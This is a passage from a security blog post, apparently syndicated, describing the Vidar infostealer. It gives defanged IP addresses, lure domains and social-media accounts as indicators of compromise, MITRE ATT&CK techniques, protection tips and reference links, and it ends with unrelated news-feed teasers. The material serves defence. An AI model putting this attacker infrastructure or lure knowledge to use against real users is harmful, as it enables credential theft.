First noticed in 2018, Vidar infostealer is a versatile malware that gained prominence in the cybercriminal ecosystem due to its efficiency in harvesting sensitive data. Initially marketed on underground forums as a Malware-as-a-Service (MaaS), Vidar is favored for its ease of use and ability to target a wide range of information, including login credentials, financial data, cryptocurrency wallets, and autofill information from browsers. The malware typically spreads through phishing campaigns, malicious advertising, or exploit kits, making it a persistent threat across multiple industries. Once deployed, Vidar operates silently, exfiltrating data to its command-and-control (C2) server while leaving minimal traces on the infected system.

One of Vidar’s most troublesome attributes is its modular architecture, allowing customization of its functionality. This adaptability lets threat actors use Vidar for reconnaissance, credential theft, or even as a precursor to more devastating attacks like ransomware. The malware is also equipped with anti-analysis techniques, such as virtual machine detection and sandbox evasion, making it challenging for security researchers to dissect its operations. Over time, Vidar has been associated with various campaigns targeting organizations globally, highlighting the growing need for robust endpoint protection, phishing awareness training, and network monitoring to counteract its impact.

Related to Arkei trojan, Vidar can even receive updates!

For additional information, here’s an interview between g0njxa and Vidar staff: https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-vidar-2c0a62a73087

For those looking to protect their network, here are some defanged IoCs (Indicators of Compromise) – IP Addresses, Domains, and Social Media. Plus some MITRE ATT&CK TTPs. This is just a sampling; much more can be found in the links in this section and the Resources at the end.

IP Addresses

162[.]241[.]225[.]237

– 5[.]79[.]66[.]145

– 104[.]21[.]45[.]70

– 193[.]29[.]187[.]162

– 104[.]18[.]5[.]149

– 45[.]151[.]144[.]128

– 18[.]205[.]93[.]2

Domains

– notepadplusplus[.]site

– download-notepad-plus-plus[.]duckdns[.]org

– download-obsstudio[.]duckdns[.]org

– dowbload-notepadd[.]duckdns[.]org

– dowbload-notepad1[.]duckdns[.]org

– download-davinci-resolve[.]duckdns[.]org

– download-davinci[.]duckdns[.]org

– download-sqlite[.]duckdns[.]org

Social Media

– hxxp://www[.]tiktok[.]com/@user6068972597711

– hxxps://t[.]me/mantarlars

– mas[.]to/@zara99

– ioc[.]exchange/@zebra54

– nerdculture[.]de/@yoxhyp

– hxxp://www[.]ultimate-guitar[.]com/u/smbfupkuhrgc1

– mas[.]to/@kyriazhs1975

– mastodon[.]online/@olegf9844g

– steamcommunity[.]com/profiles/76561199436777531

Vidar Malware MITRE ATT&CK Tactics, Techniques, & Procedures (TTPs)

Technique ID, Description

T1204 – User Execution

T1555 – Credentials from Password Stores

T1539 – Steal Web Session Cookie

T1614 – System Location Discovery

T1518 – Software Discovery

T1007 – System Service Discovery

T1095 – Non-Application Layer Protocol

T1566 – Phishing

T1552 – Unsecured Credentials

T1113 – Screen Capture

T1057 – Process Discovery

T1087 – Account Discovery

T1041 – Exfiltration Over C&C Channel

Protection

It’s never good to present all the things to be afraid of yet not show people how to protect against those fearful apparitions.

There’s a lot of information to sift through. How can we protect ourselves against all of these malicious actors? No report can provide all the ways – too many factors, and many are highly technical. But here are several ways that anybody can use, professional/technical or not.

1.     Multi-Factor Authentication (MFA/2FA): For infostealers, user credentials are a major target. Deploying MFA makes it more difficult for an attacker to use the stolen credentials.

2.     Use strong anti-malware software

a.     New to buying antimalware/antivirus? Search online for top antimalware or best antivirus suites or top 10 AV for 2025

3.     Keep systems and software up-to-date

a.    For home use and personal devices, select automatic download and then install when ready.

b.     For corporate users, automatic updates can cause big trouble for critical systems, so ensure proper testing, but update (or upgrade) when you can. I know…easier said than done.

4.     Use caution with attachments and downloads

a.     If you can slow down to think about what you’re sending or downloading, that’s a great start.

b.     Because many infostealer campaigns deliver malicious files via a phishing email, it’s great to have security solutions that can inspect email attachments for malicious content and provide the ability to rip them out before people can get to them.

5.     Implement strong password policies

a.     Typical home use of computers doesn’t require official policies, but at least keep in mind that the better your password, the better.

6.     Regularly monitor for suspicious activities

a.     Don’t click on those pop-ups on your computer, except to click on the X or Close. Even at that, those are simply buttons that could be tied to actions. So, if at all possible, close the entire browser (at least the tab) instead of clicking on the pop-up.

b.     Set a regular time to review your bank transactions. That doesn’t prevent crime, but at least a long time won’t pass without you knowing about it.

7.     Educate colleagues about social engineering

a.     Professionals – help people out. Non-professionals – ask for help. Security professionals love to help people (we might not fix things or give hour-long seminars for free, but an email now and then is possible). 

There are dangers out there, and with the right knowledge – which is readily available but often either hard to find or overabundant – you can stay safe. Go safely into and through 2025! 

Sources, Resources, and More Information

Raccoon

https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/raccoon-infostealer

https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer

https://darktrace.com/blog/the-resurgence-of-the-raccoon-steps-of-a-raccoon-stealer-v2-infection-part-2

https://cyberint.com/blog/financial-services/raccoon-stealer/

https://www.justice.gov/usao-wdtx/victim-assistance-raccoon-infostealer

https://www.linkedin.com/pulse/raccoon-stealer-announces-return-new-features-tools-mihir-bagwe

https://www.cyber.nj.gov/threat-landscape/malware/trojans/raccoon

https://www.cid.army.mil/Portals/118/Documents/Cyber-Flyers/Cyberflyer_MalwareAsAServiceRaccoonInfostealer_11-16-2022.pdf

https://www.infostealers.com/article/approaching-stealers-devs-a-brief-interview-with-recordbreaker/

https://www.kelacyber.com/wp-content/uploads/2023/05/KELA_Research_Infostealers_2023_full-report.pdf

https://www.bleepingcomputer.com/news/security/ukrainian-charged-for-operating-raccoon-stealer-malware-service/

Redline

Good and detailed summary: https://cyberflorida.org/redline-stealer-malware-analysis/

 2024 discruption: https://www.bankinfosecurity.com/dutch-police-fbi-infiltrate-info-stealer-infrastructure-a-26643

 https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/

https://www.kroll.com/en/insights/publications/cyber/redlinestealer-malware

https://proton.me/blog/infostealers

https://www.threatspike.com/blogs/redline-part-1

https://nordvpn.com/blog/redline-stealer-malware/

https://www.linkedin.com/directory/articles/t-402

https://flare.io/learn/resources/blog/redline-stealer-malware/

https://www.csk.gov.in/alerts/RedLine_infostealer_malware.html

https://securityscorecard.com/research/detailed-analysis-redline-stealer/

https://www.cloudsek.com/blog/technical-analysis-of-the-redline-stealer

 https://www.infostealers.com/technique/redline-stealer/

 https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer 

https://www.splunk.com/en_us/blog/security/do-not-cross-the-redline-stealer-detections-and-analysis.html 

https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

https://flashpoint.io/blog/redline-meta-takedown-infostealer/

https://intel471.com/blog/redline-and-meta-the-story-of-two-disrupted-infostealers

Vidar

https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/what-is-vidar-malware/

https://www.hhs.gov/sites/default/files/vidar-malware-analyst-note-tlpclear.pdf

https://wazuh.com/blog/detecting-vidar-infostealer-with-wazuh/

https://www.cyfirma.com/research/vidar-stealer-an-in-depth-analysis-of-an-information-stealing-malware/

https://blog.eclecticiq.com/polish-healthcare-industry-targeted-by-vidar-infostealer-likely-linked-to-djvu-ransomware

https://darktrace.com/blog/a-surge-of-vidar-network-based-details-of-a-prolific-info-stealer

Bot Framework

https://en.wikipedia.org/wiki/Infostealer

https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction

https://lumu.io/blog/infostealers-silent-threat-compromising-world/

https://cyberint.com/blog/research/the-new-infostealer-in-town-the-continental-stealer/

https://flashpoint.io/blog/protecting-against-infostealer-malware/

https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data

https://www.cyberark.com/resources/threat-research-blog/raccoon-the-story-of-a-typical-infostealer

 https://flashpoint.io/blog/understanding-seidr-infostealer-malware/

Secjuice – ​Read More

A 9th Telecoms Firm Has Been Hit by a Massive Chinese Espionage Campaign, the White House Says

A top White House official said at least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign.

The post A 9th Telecoms Firm Has Been Hit by a Massive Chinese Espionage Campaign, the White House Says appeared first on SecurityWeek.

SecurityWeek – ​Read More

Secure Gaming During the Holidays

Secure Gaming during holidays is essential as cyberattacks rise by 50%. Protect accounts with 2FA, avoid fake promotions,…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News – ​Read More